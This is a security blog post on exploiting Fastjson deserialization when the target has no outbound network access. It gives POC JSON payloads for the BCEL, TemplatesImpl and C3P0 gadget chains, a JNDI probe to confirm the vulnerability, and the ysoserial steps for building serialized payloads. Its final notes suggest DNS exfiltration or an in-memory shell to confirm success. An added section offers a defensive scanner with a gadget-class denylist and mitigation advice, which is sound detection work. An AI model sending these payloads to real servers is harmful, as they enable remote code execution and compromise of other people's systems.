Java: Fastjson Without Outbound Network Access

outman

2025-07-01

// Article: https://xz.aliyun.com/news/11938

// Reference material: https://github.com/safe6Sec/Fastjson

No outbound network access

The target's network is restricted, so it cannot reach the address that the JNDI reference points to.

Checking whether the vulnerability exists (no outbound access)

Point the JNDI reference at a local address with a class that does not exist and check whether the response is delayed.

{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:8088/badClassName", "autoCommit":true}}""
}

A delay confirms that the target cannot reach out but is vulnerable.

1. BCEL (Tomcat & Spring)

Bytecode bypass: the malicious class is compiled with javac and converted into BCEL-encoded bytecode.

com.sun.org.apache.bcel.internal.util.ClassLoader can load BCEL-encoded bytecode, which yields RCE.

POC:

{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$xxxx"
}

2. TemplatesImpl

The exploitation conditions are strict; the target must parse with:

JSON.parseObject(poc, Feature.SupportNonPublicField);

POC:

{
"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
"_bytecodes": ["base64(bytecode)"],
'_name': 'a.b',
'_tfactory': {},
"_outputProperties": {},
"_name": "b",
"_version": "1.0",
"allowedProtocols": "all"
}

3. C3P0

Exploitation requires the target server to have the following dependencies:

<dependency>
  <groupId>org.apache.commons</groupId>
  <artifactId>commons-collections4</artifactId>
  <version>4.0</version>
</dependency>
<dependency>
  <groupId>com.mchange</groupId>
  <artifactId>c3p0</artifactId>
  <version>0.9.5.2</version>
</dependency>

POC: the HEX is produced by running java -jar ysoserial-all.jar CommonsCollections2 "open -a Calculator" > calc.ser and then converting calc.ser to HEX with a small program.

{
"e": {
"@type": "java.lang.Class",
"val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
},
"f": {
"@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
"userOverridesAsString": "HexAsciiSerializedMap:;HEX value"
}
}
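All three offline chains above share observable traits in the request body: an "@type" key naming a gadget class, and for BCEL and C3P0 a string carrying embedded bytecode or a serialized object ("$$BCEL$$..." and "HexAsciiSerializedMap:..."). As an added defender-side example (not code from the original post or from the safe6Sec repository), the following Python scanner flags those traits in a request body or log line. The class list and the sample payloads are constructed for this example; the class names are the ones this post names, and a production denylist would be far longer. Because Fastjson accepts single-quoted strings and trailing junk that a strict JSON parser rejects (the TemplatesImpl and JdbcRowSetImpl POCs above are both non-strict), the scanner falls back to a raw-text scan when json.loads fails rather than silently passing the body.

```python
"""Scan JSON bodies for Fastjson autoType gadget markers (added example).

Walks the document structurally when it is strict JSON; otherwise falls
back to a regex scan, since Fastjson's lenient parser accepts inputs
(single quotes, trailing "") that json.loads rejects.
"""
import json
import re

# Constructed denylist for this example: the gadget entry points named in
# the post. A real deployment should use a much larger list (or better,
# disable autoType entirely on the Fastjson side).
DANGEROUS_TYPES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "com.sun.org.apache.bcel.internal.util.ClassLoader",
    "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
}

# Substrings that indicate embedded bytecode or a serialized object.
PAYLOAD_MARKERS = ("$$BCEL$$", "HexAsciiSerializedMap")

# Tolerant of single or double quotes around key and value.
_TYPE_RE = re.compile(r"""["']@type["']\s*:\s*["']([^"']+)["']""")


def _walk(node, findings, path="$"):
    """Recursively collect (severity, location, detail) from parsed JSON."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "@type":
                cls = str(value)
                sev = "high" if cls in DANGEROUS_TYPES else "medium"
                findings.append((sev, child, f"@type={cls}"))
            if isinstance(value, str):
                for marker in PAYLOAD_MARKERS:
                    if marker in value:
                        findings.append(("high", child, f"marker {marker}"))
            _walk(value, findings, child)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            _walk(value, findings, f"{path}[{i}]")


def scan(body: str):
    """Return a list of (severity, location, detail) findings for one body."""
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        # Non-strict JSON: Fastjson may still parse it, so scan the raw text.
        for m in _TYPE_RE.finditer(body):
            cls = m.group(1)
            sev = "high" if cls in DANGEROUS_TYPES else "medium"
            findings.append((sev, f"raw@{m.start()}", f"@type={cls} (non-strict JSON)"))
        for marker in PAYLOAD_MARKERS:
            if marker in body:
                findings.append(("high", "raw", f"marker {marker} (non-strict JSON)"))
        return findings
    _walk(doc, findings)
    return findings


def is_suspicious(body: str) -> bool:
    """True when any finding is high severity (known gadget class or payload marker)."""
    return any(sev == "high" for sev, _, _ in scan(body))


# Constructed sample inputs: a benign body plus the post's POC shapes with
# placeholder payload strings (no real bytecode).
BENIGN = '{"user": "alice", "roles": ["viewer"]}'
BCEL_POC = (
    '{"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",'
    ' "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},'
    ' "driverClassName": "$$BCEL$$xxxx"}'
)
TEMPLATES_POC = (
    '{"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",'
    " '_name': 'a.b', '_tfactory': {}, \"_outputProperties\": {}}"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("bcel", BCEL_POC), ("templates", TEMPLATES_POC)):
        print(label, is_suspicious(body), scan(body))
```

A scanner like this belongs in a WAF rule or a log pipeline as a detection layer; it does not replace fixing the parser. On the application side, the mitigation is to stop Fastjson from honouring "@type" at all: keep autoType disabled, enable ParserConfig.getGlobalInstance().setSafeMode(true) on Fastjson 1.2.68 and later, and never pass Feature.SupportNonPublicField to JSON.parseObject on untrusted input, since that single flag is what makes the TemplatesImpl chain above reachable.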

Miscellaneous notes

The experiments only used calc, but the calculator only pops on the target's own server, so how do you know whether it succeeded?

1. Try DNS exfiltration, if DNS is not restricted.

2. Try building an in-memory shell or a payload that echoes output.

3. Write a file and then access it, though this needs an absolute path.